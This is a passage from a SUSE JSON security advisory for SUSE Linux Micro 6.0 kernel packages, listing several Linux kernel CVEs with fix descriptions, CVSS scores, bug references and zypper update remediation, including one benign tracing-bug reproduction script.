"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2023-54194"
},
{
"cve": "CVE-2023-54201",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54201"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/efa: Fix wrong resources deallocation order\n\nWhen trying to destroy QP or CQ, we first decrease the refcount and\npotentially free memory regions allocated for the object and then\nrequest the device to destroy the object. If the device fails, the\nobject isn\u0027t fully destroyed so the user/IB core can try to destroy the\nobject again which will lead to underflow when trying to decrease an\nalready zeroed refcount.\n\nDeallocate resources in reverse order of allocating them to safely free\nthem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54201",
"url": "https://www.suse.com/security/cve/CVE-2023-54201"
},
{
"category": "external",
"summary": "SUSE Bug 1255964 for CVE-2023-54201",
"url": "https://bugzilla.suse.com/1255964"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54201"
},
{
"cve": "CVE-2023-54204",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54204"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmmc: sunplus: fix return value check of mmc_add_host()\n\nmmc_add_host() may return error, if we ignore its return value,\n1. the memory allocated in mmc_alloc_host() will be leaked\n2. null-ptr-deref will happen when calling mmc_remove_host()\nin remove function spmmc_drv_remove() because deleting not\nadded device.\n\nFix this by checking the return value of mmc_add_host(). Moreover,\nI fixed the error handling path of spmmc_drv_probe() to clean up.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54204",
"url": "https://www.suse.com/security/cve/CVE-2023-54204"
},
{
"category": "external",
"summary": "SUSE Bug 1255967 for CVE-2023-54204",
"url": "https://bugzilla.suse.com/1255967"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54204"
},
{
"cve": "CVE-2023-54207",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54207"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: uclogic: Correct devm device reference for hidinput input_dev name\n\nReference the HID device rather than the input device for the devm\nallocation of the input_dev name. Referencing the input_dev would lead to a\nuse-after-free when the input_dev was unregistered and subsequently fires a\nuevent that depends on the name. At the point of firing the uevent, the\nname would be freed by devres management.\n\nUse devm_kasprintf to simplify the logic for allocating memory and\nformatting the input_dev name string.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54207",
"url": "https://www.suse.com/security/cve/CVE-2023-54207"
},
{
"category": "external",
"summary": "SUSE Bug 1255961 for CVE-2023-54207",
"url": "https://bugzilla.suse.com/1255961"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54207"
},
{
"cve": "CVE-2023-54209",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54209"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: fix blktrace debugfs entries leakage\n\nCommit 99d055b4fd4b (\"block: remove per-disk debugfs files in\nblk_unregister_queue\") moves blk_trace_shutdown() from\nblk_release_queue() to blk_unregister_queue(), this is safe if blktrace\nis created through sysfs, however, there is a regression in corner\ncase.\n\nblktrace can still be enabled after del_gendisk() through ioctl if\nthe disk is opened before del_gendisk(), and if blktrace is not shutdown\nthrough ioctl before closing the disk, debugfs entries will be leaked.\n\nFix this problem by shutdown blktrace in disk_release(), this is safe\nbecause blk_trace_remove() is reentrant.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54209",
"url": "https://www.suse.com/security/cve/CVE-2023-54209"
},
{
"category": "external",
"summary": "SUSE Bug 1255963 for CVE-2023-54209",
"url": "https://bugzilla.suse.com/1255963"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54209"
},
{
"cve": "CVE-2023-54210",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54210"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sync: Avoid use-after-free in dbg for hci_remove_adv_monitor()\n\nKASAN reports that there\u0027s a use-after-free in\nhci_remove_adv_monitor(). Trawling through the disassembly, you can\nsee that the complaint is from the access in bt_dev_dbg() under the\nHCI_ADV_MONITOR_EXT_MSFT case. The problem case happens because\nmsft_remove_monitor() can end up freeing the monitor\nstructure. Specifically:\n hci_remove_adv_monitor() -\u003e\n msft_remove_monitor() -\u003e\n msft_remove_monitor_sync() -\u003e\n msft_le_cancel_monitor_advertisement_cb() -\u003e\n hci_free_adv_monitor()\n\nLet\u0027s fix the problem by just stashing the relevant data when it\u0027s\nstill valid.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54210",
"url": "https://www.suse.com/security/cve/CVE-2023-54210"
},
{
"category": "external",
"summary": "SUSE Bug 1255955 for CVE-2023-54210",
"url": "https://bugzilla.suse.com/1255955"
},
{
"category": "external",
"summary": "SUSE Bug 1255956 for CVE-2023-54210",
"url": "https://bugzilla.suse.com/1255956"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2023-54210"
},
{
"cve": "CVE-2023-54211",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54211"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Fix warning in trace_buffered_event_disable()\n\nWarning happened in trace_buffered_event_disable() at\n WARN_ON_ONCE(!trace_buffered_event_ref)\n\n Call Trace:\n ? __warn+0xa5/0x1b0\n ? trace_buffered_event_disable+0x189/0x1b0\n __ftrace_event_enable_disable+0x19e/0x3e0\n free_probe_data+0x3b/0xa0\n unregister_ftrace_function_probe_func+0x6b8/0x800\n event_enable_func+0x2f0/0x3d0\n ftrace_process_regex.isra.0+0x12d/0x1b0\n ftrace_filter_write+0xe6/0x140\n vfs_write+0x1c9/0x6f0\n [...]\n\nThe cause of the warning is in __ftrace_event_enable_disable(),\ntrace_buffered_event_enable() was called once while\ntrace_buffered_event_disable() was called twice.\nReproduction script show as below, for analysis, see the comments:\n ```\n #!/bin/bash\n\n cd /sys/kernel/tracing/\n\n # 1. Register a \u0027disable_event\u0027 command, then:\n # 1) SOFT_DISABLED_BIT was set;\n # 2) trace_buffered_event_enable() was called first time;\n echo \u0027cmdline_proc_show:disable_event:initcall:initcall_finish\u0027 \u003e \\\n set_ftrace_filter\n\n # 2. Enable the event registered, then:\n # 1) SOFT_DISABLED_BIT was cleared;\n # 2) trace_buffered_event_disable() was called first time;\n echo 1 \u003e events/initcall/initcall_finish/enable\n\n # 3. Try to call into cmdline_proc_show(), then SOFT_DISABLED_BIT was\n # set again!!!\n cat /proc/cmdline\n\n # 4. Unregister the \u0027disable_event\u0027 command, then:\n # 1) SOFT_DISABLED_BIT was cleared again;\n # 2) trace_buffered_event_disable() was called second time!!!\n echo \u0027!cmdline_proc_show:disable_event:initcall:initcall_finish\u0027 \u003e \\\n set_ftrace_filter\n ```\n\nTo fix it, IIUC, we can change to call trace_buffered_event_enable() at\nfist time soft-mode enabled, and call trace_buffered_event_disable() at\nlast time soft-mode disabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54211",
"url": "https://www.suse.com/security/cve/CVE-2023-54211"
},
{
"category": "external",
"summary": "SUSE Bug 1255843 for CVE-2023-54211",
"url": "https://bugzilla.suse.com/1255843"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54211"
},
{
"cve": "CVE-2023-54215",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54215"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-vdpa: Fix cpumask memory leak in virtio_vdpa_find_vqs()\n\nFree the cpumask allocated by create_affinity_masks() before returning\nfrom the function.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
